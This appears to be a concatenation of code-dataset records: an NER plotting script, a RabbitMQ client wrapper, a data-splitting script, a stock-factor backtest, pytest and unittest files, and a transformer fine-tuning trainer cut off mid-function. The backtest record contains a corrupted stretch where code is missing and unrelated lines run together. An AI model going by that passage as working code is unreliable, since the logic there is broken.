plt.yticks([])\n plt.xticks(np.linspace(N_warmstart, tot_acq + N_warmstart, 6))\n plt.xlabel('# Data Points')\n ax2 = plt.gca()\n plt.title('Test Set $\\\\mathcal{D}^T$')\n\n ax1.set_xlim(min(xmin1, xmin2), max(xmax1, xmax2))\n ax1.set_ylim(min(ymin1, ymin2), max(ymax1, ymax2))\n ax2.set_xlim(min(xmin1, xmin2), max(xmax1, xmax2))\n ax2.set_ylim(min(ymin1, ymin2), max(ymax1, ymax2))\n plt.tight_layout()\n fn = f'../figures/named_entity_recognition/perf_curves/s{search_model_seed}_e{eval_model_seed}.pdf'\n plt.savefig(abs_path(fn), bbox_inches='tight')\n\n print(f'Validation quality: {np.mean(valid_curve)}; Test quality: {np.mean(test_curve)}')\n\n spec = f'{search_model_seed} {eval_model_seed} {data_seed} {batchsize} {max_epoch} {patience} {tot_acq}'\n with shelve.open(abs_path('statistics/perf_curves.shv')) as curves:\n curves[spec] = {'valid': valid_curve, 
'test': test_curve, 'order': optimal_order}\n\ndef main_cli():\n parser = argparse.ArgumentParser(description='Plot performance curve')\n parser.add_argument('--search-model-seed', type=int, default=0, help=ht.search_model_seed)\n parser.add_argument('--eval-model-seed', type=int, help=ht.eval_model_seed)\n parser.add_argument('--data-seed', type=int, default=0, help=ht.data_seed)\n parser.add_argument('--batchsize', type=int, default=25, help=ht.batchsize)\n parser.add_argument('--max-epoch', type=int, default=100, help=ht.max_epoch)\n parser.add_argument('--patience', type=int, default=20, help=ht.patience)\n parser.add_argument('--tot-acq', type=int, default=250, help=ht.tot_acq)\n parser.add_argument('--log-dir', type=str, default='logs', help=ht.log_dir)\n parser.add_argument('--use-gpus', type=str, default='all', help=ht.use_gpus)\n parser.add_argument('--workers-per-gpu', type=int, default=1, help=ht.workers_per_gpu)\n args = parser.parse_args()\n main(**vars(args))\n\nif __name__ == '__main__':\n main_cli()\n","sub_path":"named_entity_recognition/performance_curve.py","file_name":"performance_curve.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"562636617","text":"import pika\nimport sys\nfrom config import RABBITMQ_HOST, RABBITMQ_PORT\nimport json\nfrom time import sleep\nimport threading\n\n \n\nclass consumerMQ:\n\n internal_lock = threading.Lock()\n\n def __init__(self, queue, data_processing = lambda ch, method, properties, body: ch.basic_ack(delivery_tag = method.delivery_tag)):\n self.queue = queue\n self.data_processing = data_processing\n self.connection = None\n self.channel = None\n self.create_connection()\n result = self.channel.queue_declare(\n queue=self.queue,\n durable=True,\n passive=True\n )\n print(result)\n thread = threading.Thread(target=self._process_data_events)\n thread.setDaemon(True)\n thread.start()\n \n def __del__(self):\n if self.connection != None:\n self.connection.close()\n\n\n def _process_data_events(self):\n self.channel.basic_consume(\n queue=self.queue,\n on_message_callback=self.data_processing\n )\n\n while True:\n with self.internal_lock:\n self.connection.process_data_events()\n sleep(0.1)\n \n def create_connection(self):\n while self.connection == None or self.connection.is_closed:\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=RABBITMQ_HOST,\n port=RABBITMQ_PORT\n )\n )\n sleep(0.1)\n self.create_channel()\n \n def create_channel(self):\n while self.channel == None or self.channel.is_closed:\n self.channel = self.connection.channel()\n sleep(0.1)\n\n\nclass producerMQ:\n def __init__(self, queue):\n self.queue = queue\n self.connection = None\n self.channel = None\n self.create_connection()\n \n def declare_queue(self):\n queueName = ''\n while queueName != self.queue:\n result = self.channel.queue_declare(\n queue=self.queue,\n durable=True\n )\n queueName = result.method.queue\n sleep(0.1)\n\n def create_connection(self):\n while self.connection == None or self.connection.is_closed:\n self.connection = pika.BlockingConnection(\n pika.ConnectionParameters(\n host=RABBITMQ_HOST,\n port=RABBITMQ_PORT\n )\n )\n sleep(0.1)\n self.create_channel()\n \n def create_channel(self):\n while self.channel == None or self.channel.is_closed:\n self.channel = self.connection.channel()\n sleep(0.1)\n self.declare_queue()\n\n def publish_message(self, body):\n print(body)\n if self.channel.is_open:\n try:\n 
self.channel.basic_publish(\n exchange = '',\n routing_key = self.queue,\n body=body,\n properties = pika.BasicProperties(\n delivery_mode = 2,\n )\n )\n except:\n print(\"Unable to push the message to queue {}\".format(self.queue))\n else:\n print('{} queue is not binded. Trying to get connection'.format(self.queue))\n\n def __del__(self):\n if self.connection != None:\n self.connection.close()\n\n \n\n","sub_path":"pixelgram-metadata-service/app/rabbitmq.py","file_name":"rabbitmq.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"59817887","text":"from sys import argv\nimport nltk\nimport re\n#script, filename = argv\nk=0\npos = open(\"pos.txt\",'r')\nneg = open(\"neg.txt\",'r')\nwhile(k != 10):\n\tfil = open(str(k),'w')\n\ti=0\n\tj=0\n\twhile(i != 80):\n\t\tline = pos.readline()\n\t\tlis = line.split()\n\t\tlis.append(\"1\")\n\t\tline = \" \".join(lis)\n\t\tfil.write(line)\n\t\tfil.write(\"\\n\")\n\t\tline = neg.readline()\n\t\tlis = line.split()\n\t\tlis.append(\"0\")\n\t\tline = \" \".join(lis)\n\t\tfil.write(line)\n\t\tfil.write(\"\\n\")\n\t\ti = i+1\n\tfil.close()\n\tk=k+1\n","sub_path":"cross.py","file_name":"cross.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"189244103","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 21 09:56:24 2021\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\nimport random\r\nimport itertools\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\nrootpath = \"D:\\\\czy\\\\DecisionTree_stock\\\\\" # path where optr is stored\r\nos.chdir(rootpath)\r\nimport optr\r\nimport datetime\r\nimport importlib\r\nimportlib.reload(optr)\r\npath = 'D:\\czy\\DecisionTree_stock\\\\StockData\\\\'# data path\r\noutpath = \"D:\\\\czy\\\\DecisionTree_stock\\\\output\\\\\"\r\n\r\nprint (\"setting data...\")\r\ntime_interval = 20 # default_time_interval is adjusted in optr.py\r\noptr.change_time_interval(time_interval)\r\ndata_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nyizi = pd.read_csv(path + 'yizi.csv').set_index('DATETIME') \r\nRawRet = pd.read_csv(path + 'RawRet.csv').set_index('DATETIME') \r\nyizi = yizi.applymap(lambda x: round(x, 2))\r\nRawRet = RawRet.applymap(lambda x: round(x, 2))\r\nindex_for_all = RawRet.index\r\ncolumns_for_all = RawRet.columns\r\nyizi = np.array(yizi)\r\nRawRet = np.array(RawRet)\r\nDataslide = {}\r\nfor tag in data_list:\r\n Dataslide[tag] = pd.read_csv(path + tag + '.csv').set_index('DATETIME')\r\n Dataslide[tag] = Dataslide[tag].fillna(method = 'pad')\r\n Dataslide[tag] = Dataslide[tag].applymap(lambda x: round(x, 2))\r\n Dataslide[tag] = np.array(Dataslide[tag])\r\nprint (\"data settled\")\r\n\r\n\r\n#%% backtest function \r\ndef fitness_func(factor_tmp, yizi,RawRet):\r\n # compute holdings\r\n stock_num = 300\r\n fee_oneside = 0.0007\r\n factor = factor_tmp.argsort(axis = 1).argsort(axis = 1)\r\n factor = factor + np.isnan(factor_tmp)*5000\r\n factor = (factor0)/len(Retdf)\r\n perform.loc[0,'日盈亏比'] = -Retdf.loc[Retdf['Ret']>0,'Ret'].mean()/Retdf.loc[Retdf['Ret']<0,'Ret'].mean()\r\n \r\n perform.loc[0,'最大回撤'] = Retdf['dd'].min()\r\n perform.loc[0,'夏普'] = perform.loc[0,'年化收益率']/perform.loc[0,'年化波动率']\r\n perform.loc[0,'卡玛'] = -perform.loc[0,'年化收益率']/perform.loc[0,'最大回撤']\r\n perform.loc[0,'日均换手率'] = factor.diff().abs().sum(axis = 1).mean()/2/stock_num\r\n '''\r\n return calma, Retdf\r\n\r\n#%% backtest a single factor over multiple parameter sets\r\nfactorNo = 66\r\n
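# NOTE: 'factor' + str(factorNo) below resolves to optr.factor66; optr is assumed\r\n# to expose callables factor1..factorN whose signature matches the call in the\r\n# test loop further down, e.g. a purely hypothetical sketch (not the real factor):\r\n# def factor66(A, B, C, D, a):\r\n#     ...\r\n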
f = getattr(optr, 'factor' + str(factorNo))\r\n\r\n# set the parameter grids; modify these for each factor\r\nA_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nB_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nC_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\nD_list = ['close','close_adj','high_adj','low_adj','open_adj','volume_adj','vwap_adj']\r\na_list = [10,30]\r\nb_list = [10,30]\r\nc_list = [10,25,40]\r\nd_list = [10,25,40]\r\ne_list = [10,25,40]\r\nparaLists =[]\r\nparaLists.append(A_list)\r\nparaLists.append(B_list)\r\nparaLists.append(C_list)\r\nparaLists.append(D_list)\r\nparaLists.append(a_list)\r\n#paraLists.append(b_list)\r\n#paraLists.append(c_list)\r\n#paraLists.append(d_list)\r\n#paraLists.append(e_list)\r\nparaRows = list(itertools.product(*paraLists))\r\n#paraRows_select = paraRows\r\n\r\n\r\nparaRows_select = []\r\nfor p in paraRows:\r\n if p[2] != p[1]: # drop some parameter combinations; the filter condition is user-defined\r\n paraRows_select.append(p)\r\n'''\r\n'''\r\n# test the factor\r\ncalma_result = pd.DataFrame()\r\nfor i,p in enumerate(paraRows_select):\r\n\r\n factor_tmp = f(Dataslide[p[0]],Dataslide[p[1]],Dataslide[p[2]],Dataslide[p[3]],p[4]) # modify for each factor\r\n\r\n [calma, Retdf] = fitness_func(factor_tmp, yizi,RawRet)\r\n calma_result.loc[i, 'calma'] = calma\r\n calma_result.loc[i, 'para'] = str(p)\r\n print (\"\\rprogress: \" + str(round(i/len(paraRows_select)*100, 2)) + \"%\", end = ' ') \r\n \r\ncalma_result.to_csv(outpath + \"calma_factor\" + str(factorNo) + \".csv\")\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"195030544","text":"from urllib.parse import urlsplit, urlunsplit\n\nimport pytest\nfrom hypothesis import given\nfrom hypothesis.provisional import urls\n\nfrom quarchive.value_objects import URL, BadCanonicalisationException\n\n\ndef test_from_string():\n url = URL.from_string(\"http://example.com/a?b=c#d\")\n assert url.scheme == \"http\"\n assert url.netloc == \"example.com\"\n assert url.path == \"/a\"\n assert url.query == \"b=c\"\n assert url.fragment == \"d\"\n\n\ndef test_to_string():\n url_string = \"http://example.com/a?b=c#d\"\n url = URL.from_string(url_string)\n assert url.to_string() == url_string\n\n\n@given(url=urls())\ndef test_url_uuid_stability(url):\n # This is not a piece of code as such but an important property - need to\n # be sure that urlsplit, urlunsplit and create_url_uuid work together and\n # are stable.\n assert URL.from_string(urlunsplit(urlsplit(url))) == URL.from_string(url)\n\n\n@pytest.mark.parametrize(\"problem_url\", [\"http://example.com?\", \"http://example.com#\",])\ndef test_url_from_non_minimal_canonicalisation_fails(problem_url):\n with pytest.raises(BadCanonicalisationException) as e:\n URL.from_string(problem_url)\n\n assert e.value.url_string == problem_url\n","sub_path":"src/server/tests/test_url.py","file_name":"test_url.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"634588922","text":"#!/usr/bin/env python3\nimport traceback\nimport sys\nimport doctest\nimport unittest\nimport os\nimport numpy\n\nTEST_WORK_PATH = os.path.dirname(os.path.abspath(__file__))\nsys.path.append(os.path.join(TEST_WORK_PATH, \"../src/solutions\"))\nfrom interview_questions import *\n\n\nclass TestStack(unittest.TestCase):\n def setUp(self):\n self.stack = Stack()\n\n def 
tearDown(self):\n del self.stack\n\n def test_normal_case(self):\n normal = [3, 10, 100, 50, 1000, 9]\n for i in normal:\n self.stack.push(i)\n self.assertEqual(self.stack.traverse(), normal)\n self.assertEqual(self.stack.max(), 1000)\n for i in range(2):\n self.stack.pop()\n self.assertEqual(self.stack.traverse(), normal[0:4])\n self.assertEqual(self.stack.max(), 100)\n\n\nclass TestBiggestCluster(unittest.TestCase):\n def _prepare_testing_data(self):\n # input arguments\n in_a = numpy.array([])\n in_b = numpy.array([1])\n in_c = numpy.array([1, 1, 1, 0, 0, 1, 1])\n in_d = numpy.array([[1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1, 1]])\n in_e = numpy.array([[1, 1, 1, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [0, 0, 0, 0, 0, 1, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1]])\n in_f = numpy.array([[1, 0, 0, 1, 1, 0, 1, 1],\n [1, 1, 1, 0, 0, 1, 1, 1],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 0, 0, 1, 1, 1]])\n # output results\n ot_a = []\n ot_b = [1]\n ot_c = [3, 2]\n ot_d = [26]\n ot_e = [6, 12, 3]\n ot_f = [11, 2, 3]\n self._inputList = [in_a, in_b, in_c, in_d, in_e, in_f]\n self._outputList = [ot_a, ot_b, ot_c, ot_d, ot_e, ot_f]\n\n def setUp(self):\n self._testFun = find_cluster\n self._prepare_testing_data()\n\n def tearDown(self):\n del self._inputList[:]\n del self._outputList[:]\n\n def test_find_biggest_cluster(self):\n for input, output in zip(self._inputList, self._outputList):\n with self.subTest(intput=input, output=output):\n self.assertEqual(self._testFun(input), output)\n\n\ndef suite():\n suite = unittest.TestSuite()\n test_cases = [\n TestBiggestCluster,\n TestStack\n ]\n for test_case in test_cases:\n suite.addTest(unittest.makeSuite(test_case))\n return suite\n\n\ndef run_unit_test(verbose=1):\n test_suit = suite()\n runner = unittest.TextTestRunner(verbosity=verbose)\n runner.run(test_suit)\n '''unittest.main() # run all unittest'''\n\n\ndef run_test():\n doctest.testmod()\n run_unit_test(2)\n\n\ndef main():\n try:\n run_test()\n\n except Exception as error:\n print(error)\n exc_info = sys.exc_info()\n traceback.print_exception(*exc_info)\n del exc_info\n except SystemExit as inst:\n # raised by sys.exit(True) when tests failed\n # return val of shell 0/1 represents succeed/failed\n if inst.args[0] is True:\n raise\n except:\n print(\"caught unknown exception\")\n exc_info = sys.exc_info()\n traceback.print_exception(*exc_info)\n del exc_info\n else:\n pass\n # print(\"no exception caught :) \")\n finally:\n pass\n # print(\"executing finally clause\")\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"unit_test/test_interview_questions.py","file_name":"test_interview_questions.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542830023","text":"import os\r\nimport sys\r\nimport argparse\r\nimport logging\r\nfrom tqdm.notebook import tqdm\r\nimport time\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport transformers\r\nfrom config.configs import set_random_fixed, get_path_info\r\nfrom data.dataloader import get_dataloader\r\nfrom data.tokenizer import Tokenizer\r\nfrom util.utils import (load_metricfn, load_optimizer, load_scheduler, load_lossfn, \r\n save_checkpoint, load_checkpoint, save_bestmodel, \r\n time_measurement, count_parameters, initialize_weights)\r\nfrom models.model 
import build_model\r\n\r\nclass Finetune_Trainer():\r\n def __init__(self, parser):\r\n \r\n # set parser\r\n self.args = parser.parse_args()\r\n\r\n # save loss history to plot later on\r\n self.training_history = []\r\n self.validation_history = []\r\n\r\n # set variables needed for training\r\n self.n_epoch = self.args.epoch\r\n self.train_batch_size = self.args.train_batch_size\r\n self.display_step = self.args.display_step # training\r\n self.val_batch_size = self.args.val_batch_size\r\n self.test_batch_size = self.args.test_batch_size\r\n self.display_examples = self.args.display_examples # testing\r\n \r\n self.lr = self.args.init_lr\r\n self.eps = self.args.adam_eps\r\n self.weight_decay = self.args.weight_decay\r\n self.beta1 = self.args.adam_beta1\r\n self.beta2 = self.args.adam_beta2\r\n\r\n self.warmup_steps = self.args.warm_up\r\n self.factor = self.args.factor\r\n self.patience = self.args.patience\r\n self.clip = self.args.clip\r\n\r\n self.enc_language = self.args.enc_language\r\n self.dec_language = self.args.dec_language\r\n self.enc_max_len = self.args.enc_max_len\r\n self.dec_max_len = self.args.dec_max_len\r\n\r\n self.device = self.args.device\r\n\r\n # build dataloader\r\n self.train_dataloader, self.val_dataloader, self.test_dataloader = get_dataloader(\r\n self.train_batch_size, self.val_batch_size, self.test_batch_size,\r\n self.enc_language, self.dec_language, self.enc_max_len, self.dec_max_len,\r\n self.args.dataset_name, self.args.dataset_type, self.args.category_name,\r\n self.args.x_name, self.args.y_name, self.args.percentage\r\n )\r\n self.train_batch_num = len(self.train_dataloader)\r\n self.val_batch_num = len(self.val_dataloader)\r\n self.test_batch_num = len(self.test_dataloader)\r\n \r\n self.t_total = self.train_batch_num * self.n_epoch\r\n\r\n # build tokenizer (for decoding purpose)\r\n self.decoder_tokenizer = Tokenizer(self.args.dec_language,self.args.dec_max_len)\r\n\r\n # load metric\r\n self.metric = load_metricfn(self.args.metric)\r\n \r\n # build model\r\n self.model = build_model(self.args.enc_pad_idx, self.args.dec_pad_idx,\r\n self.args.enc_vocab_size, self.args.dec_vocab_size, \r\n self.args.model_dim, self.args.key_dim, self.args.value_dim, self.args.hidden_dim, \r\n self.args.num_heads, self.args.num_layers, self.args.enc_max_len, self.args.dec_max_len, self.args.drop_prob)\r\n \r\n self.model.apply(initialize_weights)\r\n\r\n # build optimizer\r\n self.optimizer = load_optimizer(self.model, self.lr, self.weight_decay, \r\n self.beta1, self.beta2, self.eps)\r\n \r\n # build scheduler\r\n self.scheduler = load_scheduler(self.optimizer, self.factor, self.patience)\r\n \r\n # build lossfn\r\n self.lossfn = load_lossfn(self.args.lossfn,self.args.dec_pad_idx)\r\n\r\n def train_test(self):\r\n best_model_epoch, training_history, validation_history = self.finetune()\r\n best_model = self.test(best_model_epoch)\r\n self.plot(training_history, validation_history)\r\n\r\n def finetune(self):\r\n # set logging \r\n logging.basicConfig(level=logging.WARNING)\r\n \r\n # logging message\r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write('You have started training the model.\\n')\r\n print('Your model size is : ')\r\n count_parameters(self.model)\r\n sys.stdout.write('#################################################\\n')\r\n\r\n # set randomness of training procedure fixed\r\n self.set_random(516)\r\n \r\n # build directory to save to model's weights\r\n self.build_directory()\r\n\r\n # set initial 
variables for training, validation\r\n train_batch_num = len(self.train_dataloader)\r\n validation_batch_num = len(self.val_dataloader)\r\n\r\n # set initial variables for model selection\r\n best_model_epoch=0\r\n best_model_score=0\r\n best_model_loss =float('inf')\r\n\r\n # save information of the procedure of training\r\n training_history=[]\r\n validation_history=[]\r\n\r\n # predict when training will end based on average time\r\n total_time_spent = 0\r\n \r\n # start of looping through training data\r\n for epoch_idx in range(self.n_epoch):\r\n # measure time when epoch start\r\n start_time = time.time()\r\n \r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write(f\"Epoch : {epoch_idx+1} / {self.n_epoch}\")\r\n sys.stdout.write('\\n')\r\n sys.stdout.write('#################################################\\n')\r\n\r\n ########################\r\n #### Training Phase ####\r\n ########################\r\n \r\n # switch model to train mode\r\n self.model.train()\r\n\r\n # set initial variables for training (inside epoch)\r\n training_loss_per_epoch=0.0\r\n training_score_per_epoch=0.0\r\n\r\n # train model using batch gradient descent with Adam Optimizer\r\n for batch_idx, batch in tqdm(enumerate(self.train_dataloader)):\r\n # move batch of data to gpu\r\n encoder_input_ids = batch['encoder_input_ids'].to(self.device)\r\n encoder_attention_mask = batch['encoder_attention_mask'].to(self.device)\r\n decoder_input_ids = batch['decoder_input_ids'].to(self.device)\r\n decoder_labels = batch['labels'].to(self.device)\r\n decoder_attention_mask = batch['decoder_attention_mask'].to(self.device)\r\n\r\n # shift shape to (bs,sl)\r\n encoder_input_ids = encoder_input_ids.squeeze(1)\r\n decoder_input_ids = decoder_input_ids.squeeze(1)\r\n decoder_labels = decoder_labels.squeeze(1)\r\n\r\n # compute model output\r\n model_output = self.model(encoder_input_ids, decoder_input_ids[:, :-1]) # [bs,sl-1,vocab_dec]\r\n\r\n # reshape model output and labels\r\n reshaped_model_output = model_output.contiguous().view(-1,model_output.shape[-1]) # [bs*(sl-1),vocab_dec]\r\n reshaped_decoder_labels = decoder_labels[:,1:].contiguous().view(-1) # [bs*(sl-1)]\r\n \r\n # compute loss using model output and labels(reshaped ver)\r\n loss = self.lossfn(reshaped_model_output, reshaped_decoder_labels)\r\n\r\n # clear gradients, and compute gradient with current batch\r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n\r\n # clip gradients\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(),self.clip)\r\n\r\n # update gradients\r\n self.optimizer.step()\r\n\r\n # add loss to training_loss\r\n training_loss_per_iteration = loss.item()\r\n training_loss_per_epoch += training_loss_per_iteration\r\n\r\n # compute bleu score using model output and labels(reshaped ver)\r\n training_score_per_iteration,_1,_2 = self.compute_bleu(model_output,decoder_labels)\r\n training_score_per_epoch += training_score_per_iteration[\"bleu\"]\r\n\r\n # Display summaries of training procedure with period of display_step\r\n if ((batch_idx+1) % self.display_step==0) and (batch_idx>0):\r\n sys.stdout.write(f\"Training Phase | Epoch: {epoch_idx+1} | Step: {batch_idx+1} / {train_batch_num} | loss : {training_loss_per_iteration} | score : {training_score_per_iteration['bleu']}\")\r\n sys.stdout.write('\\n')\r\n\r\n # update scheduler\r\n self.scheduler.step()\r\n\r\n # save training loss of each epoch, in other words, the average of every batch in the current epoch\r\n 
training_mean_loss_per_epoch = training_loss_per_epoch / train_batch_num\r\n training_history.append(training_mean_loss_per_epoch)\r\n\r\n ##########################\r\n #### Validation Phase ####\r\n ##########################\r\n\r\n # switch model to eval mode\r\n self.model.eval()\r\n\r\n # set initial variables for validation (inside epoch)\r\n validation_loss_per_epoch=0.0 \r\n validation_score_per_epoch=0.0\r\n\r\n # evaluate model on the validation set (no parameter updates)\r\n for batch_idx, batch in tqdm(enumerate(self.val_dataloader)):\r\n # move batch of data to gpu\r\n encoder_input_ids = batch['encoder_input_ids'].to(self.device)\r\n encoder_attention_mask = batch['encoder_attention_mask'].to(self.device)\r\n decoder_input_ids = batch['decoder_input_ids'].to(self.device)\r\n decoder_labels = batch['labels'].to(self.device)\r\n decoder_attention_mask = batch['decoder_attention_mask'].to(self.device)\r\n\r\n # shift shape to (bs,sl)\r\n encoder_input_ids = encoder_input_ids.squeeze(1)\r\n decoder_input_ids = decoder_input_ids.squeeze(1)\r\n decoder_labels = decoder_labels.squeeze(1)\r\n\r\n # compute model output\r\n model_output = self.model(encoder_input_ids, decoder_input_ids[:, :-1]) # [bs,sl-1,vocab_dec]\r\n \r\n # reshape model output and labels\r\n reshaped_model_output = model_output.contiguous().view(-1,model_output.shape[-1]) # [bs*(sl-1),vocab_dec]\r\n reshaped_decoder_labels = decoder_labels[:,1:].contiguous().view(-1) # [bs*(sl-1),vocab_dec]\r\n \r\n # compute loss using model output and labels(reshaped ver)\r\n loss = self.lossfn(reshaped_model_output, reshaped_decoder_labels)\r\n\r\n # add loss to validation_loss\r\n validation_loss_per_iteration = loss.item()\r\n validation_loss_per_epoch += validation_loss_per_iteration\r\n\r\n # compute bleu score using model output and labels(reshaped ver)\r\n validation_score_per_iteration,_1,_2 = self.compute_bleu(reshaped_model_output,reshaped_decoder_labels)\r\n validation_score_per_epoch += validation_score_per_iteration[\"bleu\"]\r\n\r\n # save validation loss of each epoch, in other words, the average of every batch in the current epoch\r\n validation_mean_loss_per_epoch = validation_loss_per_epoch / validation_batch_num\r\n validation_history.append(validation_mean_loss_per_epoch)\r\n\r\n # save validation score of each epoch, in other words, the average of every batch in the current epoch\r\n validation_mean_score_per_epoch = validation_score_per_epoch / validation_batch_num\r\n\r\n # Display summaries of validation result after all validation is done\r\n sys.stdout.write(f\"Validation Phase | Epoch: {epoch_idx+1} | loss : {validation_mean_loss_per_epoch} | score : {validation_mean_score_per_epoch}\")\r\n sys.stdout.write('\\n')\r\n\r\n # Model Selection Process using validation_mean_loss_per_epoch\r\n if (validation_mean_loss_per_epoch < best_model_loss):\r\n best_model_epoch = epoch_idx\r\n best_model_loss = validation_mean_loss_per_epoch\r\n best_model_score = validation_mean_score_per_epoch\r\n\r\n save_checkpoint(self.model, self.optimizer, epoch_idx,\r\n os.path.join(self.args.weight_path,str(epoch_idx+1)+\".pth\"))\r\n\r\n # measure time when epoch end\r\n end_time = time.time()\r\n\r\n # measure the amount of time spent in this epoch\r\n epoch_mins, epoch_secs = time_measurement(start_time, end_time)\r\n sys.stdout.write(f\"Time spent in {epoch_idx+1} is {epoch_mins} minutes and {epoch_secs} seconds\\n\")\r\n \r\n # measure the total amount of time spent until now\r\n total_time_spent += (end_time - 
start_time)\r\n total_time_spent_mins = int(total_time_spent/60)\r\n total_time_spent_secs = int(total_time_spent - (total_time_spent_mins*60))\r\n sys.stdout.write(f\"Total amount of time spent until {epoch_idx+1} is {total_time_spent_mins} minutes and {total_time_spent_secs} seconds\\n\")\r\n\r\n # estimate how much more time training will take\r\n avg_time_spent_secs = total_time_spent / (epoch_idx+1)\r\n left_epochs = self.n_epoch - (epoch_idx+1)\r\n estimated_left_time = avg_time_spent_secs * left_epochs\r\n estimated_left_time_mins = int(estimated_left_time/60)\r\n estimated_left_time_secs = int(estimated_left_time - (estimated_left_time_mins*60))\r\n sys.stdout.write(f\"Estimated amount of time until {self.n_epoch} is {estimated_left_time_mins} minutes and {estimated_left_time_secs} seconds\\n\")\r\n\r\n # summary of whole procedure \r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write(f\"Training and Validation have ended.\\n\")\r\n sys.stdout.write(f\"Your best model was the model from epoch {best_model_epoch} and scored {self.args.metric} score : {best_model_score} and loss : {best_model_loss}\\n\")\r\n sys.stdout.write('#################################################\\n')\r\n\r\n return best_model_epoch, training_history, validation_history\r\n \r\n def test(self, best_model_epoch):\r\n\r\n # logging message\r\n sys.stdout.write('#################################################\\n')\r\n sys.stdout.write('You have started testing the model.\\n')\r\n sys.stdout.write('#################################################\\n')\r\n\r\n # set randomness of training procedure fixed\r\n self.set_random(516)\r\n\r\n # set weightpath\r\n weightpath = os.path.join(os.getcwd(),'weights')\r\n\r\n # loading the best_model from checkpoint (arguments must match the build_model call in __init__)\r\n best_model = build_model(self.args.enc_pad_idx, self.args.dec_pad_idx,\r\n self.args.enc_vocab_size, self.args.dec_vocab_size, \r\n self.args.model_dim, self.args.key_dim, self.args.value_dim, self.args.hidden_dim, \r\n self.args.num_heads, self.args.num_layers, self.args.enc_max_len, self.args.dec_max_len, self.args.drop_prob)\r\n \r\n load_checkpoint(best_model, self.optimizer, \r\n os.path.join(self.args.weight_path,str(best_model_epoch+1)+\".pth\"))\r\n\r\n # set initial variables for test\r\n test_batch_num = len(self.test_dataloader)\r\n\r\n ##########################\r\n ###### Test Phase ######\r\n ##########################\r\n\r\n # switch model to eval mode\r\n best_model.eval()\r\n\r\n # set initial variables for testing\r\n test_score=0.0 \r\n \r\n # evaluate model on the test set (no gradient computation)\r\n with torch.no_grad():\r\n for batch_idx, batch in tqdm(enumerate(self.test_dataloader)):\r\n # move batch of data to gpu\r\n encoder_input_ids = batch['encoder_input_ids'].to(self.device)\r\n encoder_attention_mask = batch['encoder_attention_mask'].to(self.device)\r\n decoder_input_ids = batch['decoder_input_ids'].to(self.device)\r\n decoder_labels = batch['labels'].to(self.device)\r\n decoder_attention_mask = batch['decoder_attention_mask'].to(self.device)\r\n\r\n # shift shape to (bs,sl)\r\n encoder_input_ids = encoder_input_ids.squeeze(1)\r\n decoder_input_ids = decoder_input_ids.squeeze(1)\r\n decoder_labels = decoder_labels.squeeze(1)\r\n\r\n # compute model output\r\n best_model_output = best_model(encoder_input_ids, decoder_input_ids[:, :-1]) # [bs,sl-1,vocab_dec]\r\n \r\n # reshape model output and labels\r\n reshaped_best_model_output = 
best_model_output.contiguous().view(-1,best_model_output.shape[-1]) # [bs*(sl-1),vocab_dec]\r\n reshaped_decoder_labels = decoder_labels[:,1:].contiguous().view(-1) # [bs*(sl-1),vocab_dec]\r\n \r\n # compute bleu score using model output and labels(reshaped ver)\r\n test_score_per_iteration,_1,_2 = self.compute_bleu(reshaped_best_model_output,reshaped_decoder_labels)\r\n test_score += test_score_per_iteration[\"bleu\"]\r\n \r\n # Display examples of translation with period of display_examples\r\n if (batch_idx+1) % self.display_examples==0 and batch_idx>0:\r\n # decode model_output and labels using Tokenizer\r\n decoded_origins = self.decoder_tokenizer.decode(encoder_input_ids)\r\n decoded_preds = self.decoder_tokenizer.decode(best_model_output)\r\n decoded_labels = self.decoder_tokenizer.decode(decoder_labels)\r\n\r\n # post process text for evaluation\r\n decoded_origins = [origin.strip() for origin in decoded_origins]\r\n decoded_preds = [pred.strip() for pred in decoded_preds]\r\n decoded_labels = [label.strip() for label in decoded_labels]\r\n\r\n # print out model_input(origin), model_output(pred) and labels(ground truth); wrap lists in str() for write()\r\n sys.stdout.write(f\"Testing Phase | Step: {batch_idx+1} / {test_batch_num}\\n\")\r\n sys.stdout.write(\"Original Sentence : \")\r\n sys.stdout.write(str(decoded_origins))\r\n sys.stdout.write('\\n')\r\n sys.stdout.write(\"Ground Truth Translated Sentence : \")\r\n 